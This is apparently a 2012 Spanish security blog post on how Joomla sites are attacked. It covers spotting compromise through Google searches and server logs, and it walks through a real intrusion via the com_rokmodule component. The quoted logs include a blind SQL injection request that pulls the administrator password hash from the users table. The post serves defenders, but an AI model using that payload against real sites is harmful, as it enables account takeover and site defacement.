inode64 logo

Como es atacado un sistema Joomla (1ª Parte)

Francisco Javier Félix Belmonte

03 de junio de 2012

Francisco Javier Félix Belmonte

Como es atacado un sistema Joomla (1ª Parte)

Es habitual que la seguridad pase a un segundo plano en el mantenimiento de la web corporativa de una empresa y se argumentan las típicas excusas:

Sin embargo, la realidad es que hay muchas personas malintencionadas interesadas en explotar el potencial de las webs. Los usuarios, pensando que la web es completamente legítima, pueden ser infectados con código malicioso o redirigidos a enlaces de productos ficticios (como viagras, pastillas, etc.), lo que perjudica seriamente la reputación de la web y de la empresa. Esto incluso puede poner en peligro las relaciones con los clientes.

Cómo detectar si tu web está comprometida

  1. Búsqueda en Google Realiza una búsqueda como la siguiente para comprobar si tu web está comprometida con enlaces externos:

    site:***** (pharm|viagra)

    Reemplaza ***** con tu dominio, por ejemplo, inode64.com o villarrealcf.es.

  2. Análisis de registros del servidor Revisa los logs del servidor web para detectar accesos sospechosos. Por ejemplo:

    79.142.73.67 - - [11/Apr/2012:05:29:04 +0200] "GET / HTTP/1.1" 200 152204 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
    79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /administrator/ HTTP/1.1" 200 7202 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
    ...

    En este ejemplo, se comprueban diferentes componentes conocidos por tener problemas de seguridad, como:

Cómo actúan los atacantes

Los atacantes suelen seguir estos pasos:

  1. Analizan la web para identificar los módulos instalados.
  2. Comprueban si los módulos tienen vulnerabilidades conocidas.
  3. Realizan el ataque para obtener privilegios de administrador e insertar código malicioso.

Este proceso puede llevar días o incluso meses antes de que se ejecute el ataque final. Normalmente, los ataques son automáticos y se seleccionan las webs con mayor repercusión.

Ejemplo de ataque

En este caso, se encontró un componente vulnerable (com_rokmodule) que fue explotado para modificar la contraseña del administrador. Aquí un extracto de los logs:

79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=1) HTTP/1.1" 200 1772 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))=108) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"

Recomendaciones finales

Sigue leyendo la 2º Parte

joomlaataquesseguridad